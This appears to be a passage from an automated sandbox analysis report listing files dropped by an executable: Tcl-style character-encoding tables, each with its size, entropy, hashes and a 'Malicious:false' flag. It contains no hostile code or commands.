                                                                                                                                                                                                                              Preview:# Encoding file: gb1988, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..002000210022002300A500250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D203E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):85912
                                                                                                                                                                                                                              Entropy (8bit):2.3945751552930936
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:D47/S+i8vdx3Tz+hpHcBrQqKtrebjMIGCx8jE:0c873T6DHcBrbKtrVlE
                                                                                                                                                                                                                              MD5:9357E05C74D6A124825F46A42B280C14
                                                                                                                                                                                                                              SHA1:E5106ABE12D991AFE514F41E3B9E239202A4ADFE
                                                                                                                                                                                                                              SHA-256:C445E4C9F676AE997D2DDA2BBC107B746F3547D85F39479951C56F46275EE355
                                                                                                                                                                                                                              SHA-512:B2187D70A92FB38572BA46F3C3443233BEED1A4ABBFBA1B860F4BBAE6B3D8C16B8C9F52A20DAA12B2B8B40972E52F816860427B743530177E4CF0D8BA34EF381
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: gb2312, double-byte..D..233F 0 81..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300230FB02C902C700A8300330052015FF5E2225202620182019..201C201D3014301530083009300A300B300C300D300E300F3016301730103011..00B100D700F72236222722282211220F222A222922082237221A22A522252220..23122299222B222E2261224C2248223D221D2260226E226F22642265221E2235..22342642264000B0203220332103FF0400A4FFE0FFE1203000A7211626062605..25CB25CF25CE25C725C625A125A025B325B2203B219221902191219330130000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):86971
                                                                                                                                                                                                                              Entropy (8bit):2.3925661740847697
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:UHivP+bFFScXEBFhHeUrUFESCeYjN7GC0nYX:I7FFX2nHeUr8ESCDlX
                                                                                                                                                                                                                              MD5:C5AA0D11439E0F7682DAE39445F5DAB4
                                                                                                                                                                                                                              SHA1:73A6D55B894E89A7D4CB1CD3CCFF82665C303D5C
                                                                                                                                                                                                                              SHA-256:1700AF47DC012A48CEC89CF1DFAE6D1D0D2F40ED731EFF6CA55296A055A11C00
                                                                                                                                                                                                                              SHA-512:EEE6058BD214C59BCC11E6DE7265DA2721C119CC9261CFD755A98E270FF74D2D73E3E711AA01A0E3414C46D82E291EF0DF2AD6C65CA477C888426D5A1D2A3BC5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: euc-cn, multi-byte..M..003F 0 82..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.949409835601965
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SOd5MNXVSVLqRIBXS4ovLE9sDXMVyXK9ow1Deq9Ts5dRPMSXcRA0kcR4X9cL+TXI:SVNFS0oyisLMsXK9okTw/BDSVKNw
                                                                                                                                                                                                                              MD5:D3AC33390D31705FA4486D0B455247DF
                                                                                                                                                                                                                              SHA1:2EE8613DC04A6FA84AB38FD5F3A2AA3FE330625B
                                                                                                                                                                                                                              SHA-256:98074C85650A420A095ADA9138DA3A8A0AA4027BE47EA1E97A596F319EB084E9
                                                                                                                                                                                                                              SHA-512:CB265B753C84968E2D1D6E706906DA9A7BB796D08F626290BCCA8F089771AFD176A9DC912773E8BA390D2AEC08592AD535C7D254E1DF92CF04848601481D4EFE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso2022-jp, escape-driven..E..name..iso2022-jp..init..{}..final..{}..ascii..\x1b(B..jis0201..\x1b(J..jis0208..\x1b$B..jis0208..\x1b$@..jis0212..\x1b$(D..gb2312..\x1b$A..ksc5601..\x1b$(C..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):122
                                                                                                                                                                                                                              Entropy (8bit):4.978693690727393
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SOd5MNXVTEXIBXS4ovLE9sDXNvdwUHEQwqc6XWxVUNOov:SVNFSoyisL/Zzc6mYNHv
                                                                                                                                                                                                                              MD5:057CB0AA9872AC3910184F67AC6621BC
                                                                                                                                                                                                                              SHA1:BBA47F9D76B6690C282724C3423BD94E2C320A04
                                                                                                                                                                                                                              SHA-256:234811FC8B0F8FF2B847D9CC3982F1699DF1D21A43C74DCE45BA855D22520007
                                                                                                                                                                                                                              SHA-512:019F187D2D16FB51BF627ACB7E67778857E56D4C160E0E5ACA6ABC05EC5FDB624CE2715CB9E0DAD73BFF9D697982BE0D539BC55BCCD368FC7C8EE0FFC04E9F61
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso2022-kr, escape-driven..E..name..iso2022-kr..init..\x1b$)C..final..{}..iso8859-1.\x0f..ksc5601..\x0e..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):240
                                                                                                                                                                                                                              Entropy (8bit):4.95909788984399
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SVNFUXoyisLNcs9ozc6W4Twk0sRBDSVKN6tWIHRy:oUYcLNcTzczbwRYRy
                                                                                                                                                                                                                              MD5:BB186D4BE3FA67DD3E2DEE82DD8BD628
                                                                                                                                                                                                                              SHA1:93CE8627038780CFFF8C06E746DD5FB2B041115C
                                                                                                                                                                                                                              SHA-256:741B4C842557EED2952936204D0AE9C35FA3A0F02F826D94C50C46976291797C
                                                                                                                                                                                                                              SHA-512:4921E7AA3DB8E33609603FE129B97275DFF80CFB06648D2068FA7950246C67B9B530B74827638F69F4DFB8F55CDD4AA952EA72EAEB6ABB527D52F20C6B46FB51
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso2022, escape-driven..E..name..iso2022..init..{}..final..{}..iso8859-1.\x1b(B..jis0201..\x1b(J..gb1988..\x1b(T..jis0208..\x1b$B..jis0208..\x1b$@..jis0212..\x1b$(D..gb2312..\x1b$A..ksc5601..\x1b$(C..jis0208..\x1b&@\x1b$B..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.236046263464657
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:iyHVBUlJvRj7SOVbusZhAMiZyi77qimmvGNNlkL+rSMH+tKv:iyMlBVnrAMiwMmTmokLz0
                                                                                                                                                                                                                              MD5:3538A970CD098BF5CE59005FE87B6626
                                                                                                                                                                                                                              SHA1:285A96CC40D7CCE104FB4B407C7F0C400AA8F9CB
                                                                                                                                                                                                                              SHA-256:A9CB4F4CA111608F882729BC5EB1C2F15530C515EF02DD2CA62F2D8DC5A210CF
                                                                                                                                                                                                                              SHA-512:A6A6F2D8B5C22E240D195D168A604887062508FF3340D24E13BFCBD6C2E687347F2CFE724FA2ED12F36915B55EE2CFD901EC3F08E2B0A2FFD3BC2A98BBD12A50
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-1, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E300
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.319750415373386
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:jHVBUlJvRj7SOVbusZhAMiZyi77qimXG2yM6q7KytC:jMlBVnrAMiwMmTXG2gytC
                                                                                                                                                                                                                              MD5:CBDE40170FECD2496A9DA3CF770FAB7B
                                                                                                                                                                                                                              SHA1:3E1D74DF6AFEB6CDE8ECBDAC8F81F2F9C64150DE
                                                                                                                                                                                                                              SHA-256:48F4A239C25354F0E9F83A39F15D4632BB18A9C33E60C671C67307159917ECED
                                                                                                                                                                                                                              SHA-512:A26B56A4CFE29E5A0A0B3A55283A7767397693388E2DEEC342C69B6F718FAE2407EB8D5ADE538FAE6947CBB8B052943C3A52F2D046ABAC7A3DAA86D730DC293F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-10, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0010401120122012A0128013600A7013B011001600166017D00AD016A014A..00B0010501130123012B0129013700B7013C011101610167017E2015016B014B..010000C100C200C300C400C500C6012E010C00C9011800CB011600CD00CE00CF..00D00145014C00D300D400D500D6016800D8017200DA00DB00DC00DD00DE00DF..010100E100E200E30
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.3206399689840476
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:6HVBUlJvRj7SOVbusZhAMiZyi77qimwHmEU4AyqU+TWwdd:6MlBVnrAMiwMmTf4AyqUSd
                                                                                                                                                                                                                              MD5:E2A0BCB83BFC3F435CDCFC20D5CF2E0C
                                                                                                                                                                                                                              SHA1:CFD18B5B5DB4EE46E63D912B8FD66D513C4C8D39
                                                                                                                                                                                                                              SHA-256:21E769C5A66E4D12D6E7DB24022E92AF1EC0D0331FE3C8C605654F239C0F3640
                                                                                                                                                                                                                              SHA-512:C86F9180F2F4A177F1EA10E26B0903ABEAFDDE0317C332A48F8D1BB586DAC91C68800E2E4FA2CD739C435419B106CBA4BEFC049F2BCD720E9FC2C0AE8436CFAC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-11, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.338879965076632
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:olHVBUlJvRj7SOVbusZhAMiZyi77qim2w4kBUioGnd2:olMlBVnrAMiwMmT/WNI2
                                                                                                                                                                                                                              MD5:21CEBB723D47B1450A7FB21A82470B97
                                                                                                                                                                                                                              SHA1:A40FD3AFE1ECE89E3F682D527D281BC563DB3892
                                                                                                                                                                                                                              SHA-256:3271D39D7B4DCD841E8E5D5153D1B8837718B88FEFEC73DC37D314816EEFE5E5
                                                                                                                                                                                                                              SHA-512:3A0E033A4D93C679215F672C6C4FE425D63E1DE157AA671E7400639165EC3EB498E4EEB030D6FB8FF8BE2FD8C986D341036A8CED9FA094D092CF2822D5DC065B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-13, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0201D00A200A300A4201E00A600A700D800A9015600AB00AC00AD00AE00C6..00B000B100B200B3201C00B500B600B700F800B9015700BB00BC00BD00BE00E6..0104012E0100010600C400C501180112010C00C90179011601220136012A013B..01600143014500D3014C00D500D600D701720141015A016A00DC017B017D00DF..0105012F010101070
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.3670559016263915
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:vHVBUlJvRj7SOVbusZhAMiZyi77qimhw6COlk1fKMH+tiH:vMlBVnrAMiwMmT/tlkQz0
                                                                                                                                                                                                                              MD5:FDAA88946DE4EB4E6D37F2B6AFCF6CAF
                                                                                                                                                                                                                              SHA1:56FC4773941E7457EA04EDA92C883642DE45D100
                                                                                                                                                                                                                              SHA-256:F0A5675027FB1CA34B4E4128D24C2968CD275890569A32A86AFA4994CE4983E0
                                                                                                                                                                                                                              SHA-512:92658A6FEB42A41B3CFFC377C4A9A3F6780A79FC596D3FEDBA6D3B3D75A9F40E859A2CE8DC579A278BAEEDEEFA2408E2B7853D99D5C2D14AACF63C521FE2BB86
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-14, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A01E021E0300A3010A010B1E0A00A71E8000A91E821E0B1EF200AD00AE0178..1E1E1E1F012001211E401E4100B61E561E811E571E831E601EF31E841E851E61..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..017400D100D200D300D400D500D61E6A00D800D900DA00DB00DC00DD017600DF..00E000E100E200E30
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.260398494526282
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:mHVBUlJvRj7SOVbusZhAMiZyi77qimmRf4kL+rSMH+tKv:mMlBVnrAMiwMmTmCkLz0
                                                                                                                                                                                                                              MD5:D779D5E2A0083C616A226B2D82ABF0EB
                                                                                                                                                                                                                              SHA1:D1657DB5E2989EBA80BAB98A1E1217CFFFBB19DB
                                                                                                                                                                                                                              SHA-256:C74E8E23A0FF0D5DEA7C318CA20DC817DA4E57B0DD61B3361FC0D5098A9316FE
                                                                                                                                                                                                                              SHA-512:26E62BE8AE793ED3B725BF0D1BABF4D6ED63A6F3772ABD48955FC4394BDE5A47614D1FF89A21A828676BF1302F3C9361B557B0FBF0DF8561FB7E66542FE94CDC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-15, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A320AC00A5016000A7016100A900AA00AB00AC00AD00AE00AF..00B000B100B200B3017D00B500B600B7017E00B900BA00BB01520153017800BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E30
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.3065938185320918
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:dHVBUlJvRj7SOVbusZhAMiZyi77qim0SmmPkYTtyL:dMlBVnrAMiwMmTttPkYpyL
                                                                                                                                                                                                                              MD5:74FDEDDAF670023DA7751FB321E345A0
                                                                                                                                                                                                                              SHA1:0677FED67C1333A9A74D50642E5214701A57E2AF
                                                                                                                                                                                                                              SHA-256:640D977EC1D22B555C5075798DA009E3523E8F55F29BE22A3050CD1B4EF7B80E
                                                                                                                                                                                                                              SHA-512:AC02FD95159A856A9DDEF4E6A8216B958DC07311B553FF39403DC5B77E1AFF2A2C4C03F5F26A2BB7AD5DB6800BEE03E895554556DBBFBE89426286796ADE55AC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-16, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A001040105014120AC201E016000A7016100A9021800AB017900AD017A017B..00B000B1010C0142017D201D00B600B7017E010D021900BB015201530178017C..00C000C100C2010200C4010600C600C700C800C900CA00CB00CC00CD00CE00CF..0110014300D200D300D4015000D6015A017000D900DA00DB00DC0118021A00DF..00E000E100E201030
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.340505173539446
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:UHVBUlJvRj7SOVbusZhAMiZyi77qim/ssm5VO6ys2K:UMlBVnrAMiwMmT/ssYTys2K
                                                                                                                                                                                                                              MD5:9B87850646FFE79F3C8001CBCB5BB3A1
                                                                                                                                                                                                                              SHA1:8F97576F3FB3B5DBEF71DC2C9314AB5E530974D6
                                                                                                                                                                                                                              SHA-256:76949B03F57041B07F41902BD7505AB3594D79AA8F7BDEED5F0481004B10CBC3
                                                                                                                                                                                                                              SHA-512:101A28AF0799E7E0A5723E5DD76D5EF0FEEF584AC479A88F499CB3B7D2AA93767D72F8E51C76F7547F08FF8DD3CBBA7FF444BD07F99A92755526E75C596109EF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-2, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0010402D8014100A4013D015A00A700A80160015E0164017900AD017D017B..00B0010502DB014200B4013E015B02C700B80161015F0165017A02DD017E017C..015400C100C2010200C40139010600C7010C00C9011800CB011A00CD00CE010E..01100143014700D300D4015000D600D70158016E00DA017000DC00DD016200DF..015500E100E2010300
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.2507537230559977
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:tHVBUlJvRj7SOVbusZhAMiZyi77qimw2g0kgTJMkFtoD:tMlBVnrAMiwMmTo0kgTJDoD
                                                                                                                                                                                                                              MD5:CBD0B9CDCD9BC3D5F2429A760CF98D2F
                                                                                                                                                                                                                              SHA1:6DEF0343E0357E0671002A5D2F0BFC2E00C8BCF9
                                                                                                                                                                                                                              SHA-256:1F51E7BDA64D466C16FEE9A120BBE3353A10CEB9DAB119FFA326779BA78D8C5D
                                                                                                                                                                                                                              SHA-512:88DB6D23B53F4A78133C794ED42FA3F29A4ABAD35DE4B022040FA187AA59B00664CC13F47AFF4507D72F4CB2166F026144213EE760AB0FD67CDD2FA5906F434A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-3, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0012602D800A300A40000012400A700A80130015E011E013400AD0000017B..00B0012700B200B300B400B5012500B700B80131015F011F013500BD0000017C..00C000C100C2000000C4010A010800C700C800C900CA00CB00CC00CD00CE00CF..000000D100D200D300D4012000D600D7011C00D900DA00DB00DC016C015C00DF..00E000E100E2000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.3413832766873073
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:KHVBUlJvRj7SOVbusZhAMiZyi77qimX4AsD/njR7Ky8hA:KMlBVnrAMiwMmTXBs3EyuA
                                                                                                                                                                                                                              MD5:8B620EDECAC2DF15A024C2CE15FB64A5
                                                                                                                                                                                                                              SHA1:65C5EE5D08964E37393E6A78ABA0DB16D51240E2
                                                                                                                                                                                                                              SHA-256:66B3CF994F0B5E0103D13E812958320AFB555C91E3F81B579D4CBF231E6A0805
                                                                                                                                                                                                                              SHA-512:93391325405D3AEA0A913F5EA8EA0391920D10F234C26AB1DA70992702889A3AF7B85E11A1FCA554690942B238CE313DD460798E59C5B1F4069036E7B0F24F44
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
